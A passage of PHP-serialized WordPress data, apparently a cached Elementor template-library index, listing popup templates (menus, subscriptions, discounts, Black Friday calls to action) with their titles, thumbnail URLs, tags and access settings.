Shop\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/health-blog-91-small-1.jpg\";s:12:\"tmpl_created\";i:1647773067;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-urban-clothing-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Discount\",\"Ecommerce\",\"Fashion\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:60;a:19:{s:4:\"tmpl\";i:1343;s:2:\"id\";i:23004;s:5:\"title\";s:60:\"Full Screen | Menu | Digital &#038; Technology Design School\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-design-tech-school-small-1.jpg\";s:12:\"tmpl_created\";i:1647773366;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:155:\"https://library.elementor.com/popups/full-screen-menu-digital-technology-design-school/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:61;a:19:{s:4:\"tmpl\";i:1344;s:2:\"id\";i:23015;s:5:\"title\";s:62:\"Bottom Bar | Contact | Digital &#038; Technology Design School\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-design-tech-school-small.jpg\";s:12:\"tmpl_created\";i:1647773492;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/popups/bottom-bar-contact-digital-technology-design-school/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:23:\"[\"Contact\",\"Portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:62;a:19:{s:4:\"tmpl\";i:1345;s:2:\"id\";i:23025;s:5:\"title\";s:32:\"Full Screen | Menu | Flower Shop\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/flower-shop-small.jpg\";s:12:\"tmpl_created\";i:1647773820;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/full-screen-menu-flower-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:63;a:19:{s:4:\"tmpl\";i:1346;s:2:\"id\";i:23037;s:5:\"title\";s:36:\"Classic | Subscription | Flower Shop\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/flower-shop-small-1.jpg\";s:12:\"tmpl_created\";i:1647773949;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-flower-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Discount\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:64;a:19:{s:4:\"tmpl\";i:1347;s:2:\"id\";i:23056;s:5:\"title\";s:48:\"Classic | Discount | Health &#038; Fitness eBook\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/fitness-ebook-small-1.jpg\";s:12:\"tmpl_created\";i:1647774468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-discount-health-fitness-ebook/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:65;a:19:{s:4:\"tmpl\";i:1348;s:2:\"id\";i:23067;s:5:\"title\";s:37:\"Fly-In | Menu | Baby Sleep Consultant\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/baby-sleep-consultant-small-1.jpg\";s:12:\"tmpl_created\";i:1647778954;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/baby-sleep-consultant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:66;a:19:{s:4:\"tmpl\";i:1349;s:2:\"id\";i:23077;s:5:\"title\";s:46:\"Classic | Subscription | Baby Sleep Consultant\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/baby-sleep-consultant-small.jpg\";s:12:\"tmpl_created\";i:1647779074;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/classic-subscription-baby-sleep-consultant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:12:\"[\"Discount\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:67;a:19:{s:4:\"tmpl\";i:1350;s:2:\"id\";i:23090;s:5:\"title\";s:33:\"Full Screen | Menu | Luxury Hotel\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/luxury-hotel-small.jpg\";s:12:\"tmpl_created\";i:1647779390;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/full-screen-menu-luxury-hotel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:68;a:19:{s:4:\"tmpl\";i:1351;s:2:\"id\";i:23100;s:5:\"title\";s:31:\"Fly-In | Booking | Luxury Hotel\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/luxury-hotel-small-1.jpg\";s:12:\"tmpl_created\";i:1647779500;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-booking-luxury-hotel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Booking\",\"Travel\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:69;a:19:{s:4:\"tmpl\";i:1352;s:2:\"id\";i:23109;s:5:\"title\";s:38:\"Full Screen | Menu | Design Conference\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/design-conference-35-small.jpg\";s:12:\"tmpl_created\";i:1647779675;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-menu-design-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:70;a:19:{s:4:\"tmpl\";i:1353;s:2:\"id\";i:23120;s:5:\"title\";s:41:\"Full Screen | Booking | Design Conference\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/design-conference-35-small-1.jpg\";s:12:\"tmpl_created\";i:1647779793;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/full-screen-booking-design-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:35:\"[\"Booking\",\"Conference\",\"Creative\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:71;a:19:{s:4:\"tmpl\";i:1354;s:2:\"id\";i:23129;s:5:\"title\";s:29:\"Slide-In | Menu | VR Headsets\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/VR-headset-small.jpg\";s:12:\"tmpl_created\";i:1647781211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/slide-in-menu-vr-headsets/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:72;a:19:{s:4:\"tmpl\";i:1355;s:2:\"id\";i:23139;s:5:\"title\";s:31:\"Classic | Contact | VR Headsets\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/VR-headset-small-1.jpg\";s:12:\"tmpl_created\";i:1647781384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-contact-vr-headsets/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:73;a:19:{s:4:\"tmpl\";i:1356;s:2:\"id\";i:23149;s:5:\"title\";s:38:\"Slide-In | Menu | Portrait Photography\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/48-portrair-photography-Menu.jpg\";s:12:\"tmpl_created\";i:1647782336;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/slide-in-menu-portrait-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:74;a:19:{s:4:\"tmpl\";i:1357;s:2:\"id\";i:23159;s:5:\"title\";s:47:\"Hello Bar | Subscription | Portrait Photography\";s:9:\"thumbnail\";s:97:\"https://library.elementor.com/wp-content/uploads/2022/03/48-portrair-photography-Subscription.jpg\";s:12:\"tmpl_created\";i:1647782478;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/hello-bar-subscription-portrait-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Blog\",\"Photography\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:75;a:19:{s:4:\"tmpl\";i:1358;s:2:\"id\";i:23169;s:5:\"title\";s:32:\"Full Screen | Menu | English Pub\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/49-englisg-pub-Menu.jpg\";s:12:\"tmpl_created\";i:1647782664;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/full-screen-menu-english-pub/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:76;a:19:{s:4:\"tmpl\";i:1359;s:2:\"id\";i:23179;s:5:\"title\";s:32:\"Classic | Discount | English Pub\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/49-englisg-pub-Discount.jpg\";s:12:\"tmpl_created\";i:1647782796;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-discount-english-pub/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:20:\"[\"Discount\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:77;a:19:{s:4:\"tmpl\";i:1360;s:2:\"id\";i:23189;s:5:\"title\";s:27:\"Full Screen | Menu | Singer\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/58-Music-Artist-Menu.jpg\";s:12:\"tmpl_created\";i:1647783070;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/full-screen-menu-singer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:29:\"[\"Fullscreen\",\"menu\",\"Music\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:78;a:19:{s:4:\"tmpl\";i:1361;s:2:\"id\";i:23200;s:5:\"title\";s:31:\"Classic | Subscription | Singer\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/58-Music-Artist-Subscription.jpg\";s:12:\"tmpl_created\";i:1647783249;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-subscription-singer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Music\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:79;a:19:{s:4:\"tmpl\";i:1362;s:2:\"id\";i:23210;s:5:\"title\";s:38:\"Full Screen | Menu | Virtual Assistant\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/virtual-assistnt-73-small.jpg\";s:12:\"tmpl_created\";i:1647784292;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-menu-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:80;a:19:{s:4:\"tmpl\";i:1363;s:2:\"id\";i:23223;s:5:\"title\";s:39:\"Hello Bar | Contact | Virtual Assistant\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/73-Virtual-Assistant-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647784616;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-contact-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:37:\"[\"Contact\",\"Psychologist\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:81;a:19:{s:4:\"tmpl\";i:1364;s:2:\"id\";i:23234;s:5:\"title\";s:32:\"Slide-In  | Menu | Personal Chef\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/74-Personal-Chef-Menu.jpg\";s:12:\"tmpl_created\";i:1647798194;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/slide-in-menu-personal-chef/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:82;a:19:{s:4:\"tmpl\";i:1365;s:2:\"id\";i:23244;s:5:\"title\";s:29:\"Classic | CTA | Personal Chef\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/74-Personal-Chef-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647798297;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-personal-chef/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Booking\",\"Chef\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:83;a:19:{s:4:\"tmpl\";i:1366;s:2:\"id\";i:23254;s:5:\"title\";s:31:\"Full Screen | Menu | Food Truck\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/food-truck-76-small-1.jpg\";s:12:\"tmpl_created\";i:1647798447;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/full-screen-menu-food-truck/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:84;a:19:{s:4:\"tmpl\";i:1367;s:2:\"id\";i:23265;s:5:\"title\";s:30:\"Fly-In | Discount | Food Truck\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/food-truck-76-small.jpg\";s:12:\"tmpl_created\";i:1647798657;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-discount-food-truck/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Discount\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:85;a:19:{s:4:\"tmpl\";i:1369;s:2:\"id\";i:23323;s:5:\"title\";s:28:\"Classic | CTA | Black Friday\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-6-Small.jpg\";s:12:\"tmpl_created\";i:1647855505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-cta-black-friday/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:86;a:19:{s:4:\"tmpl\";i:1370;s:2:\"id\";i:23329;s:5:\"title\";s:29:\"Slide-In | CTA | Black Friday\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-5-Small.jpg\";s:12:\"tmpl_created\";i:1647855865;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/slide-in-cta-black-friday/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:87;a:19:{s:4:\"tmpl\";i:1371;s:2:\"id\";i:23335;s:5:\"title\";s:31:\"Slide-In | CTA | Black Friday 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-1-Small.jpg\";s:12:\"tmpl_created\";i:1647856357;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/slide-in-cta-black-friday-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:88;a:19:{s:4:\"tmpl\";i:1372;s:2:\"id\";i:23341;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 